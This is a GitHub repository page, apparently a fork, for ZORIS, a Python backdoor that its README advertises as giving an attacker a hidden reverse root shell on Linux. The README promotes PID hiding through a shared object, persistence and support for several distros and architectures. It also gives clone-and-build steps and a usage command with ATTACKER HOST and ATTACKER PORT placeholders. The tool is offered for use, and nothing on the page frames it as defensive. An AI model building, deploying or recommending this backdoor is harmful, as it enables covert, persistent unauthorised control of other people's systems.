Skip to content
/ Zoris Public
forked from MrEmpy/Zoris

「🚪」The hidden hookless backdoor

License

Notifications You must be signed in to change notification settings

5l1v3r1/Zoris

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

「🚪」ZORIS

ZORIS is a simple backdoor created in python in order to bring the shell of a linux system to a machine through the reverse connection, but make no mistake, ZORIS has a shared object (so) that allows you to hide the PID of the backdoor installed on the system, keeping it out of sight of other users inside the machine and being silent. It is necessary to be the root user, but by activating it, its persistence is certain.

Benefits:

  • Reverse shell connection as root

  • Hide the PID

  • Persistence

Tested linux distro

  • Arch Linux
  • CentOS
  • Debian
  • Fedora
  • openSUSE
  • Gentoo

How to use

# ./zoris -rh <ATTACKER HOST> -rp <ATTACKER PORT>

Installation

# git clone https://github.com/MrEmpy/zoris.git
# chmod +x build.sh
# ./build.sh

Note: If you prefer, we have the ZORIS static binary in the static directory with all dependencies inserted.

Available architecture of static binary

  • amd64
  • i386
  • arm64
  • armv7

About

「🚪」The hidden hookless backdoor

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 51.9%
  • Shell 38.5%
  • C 8.6%
  • Makefile 1.0%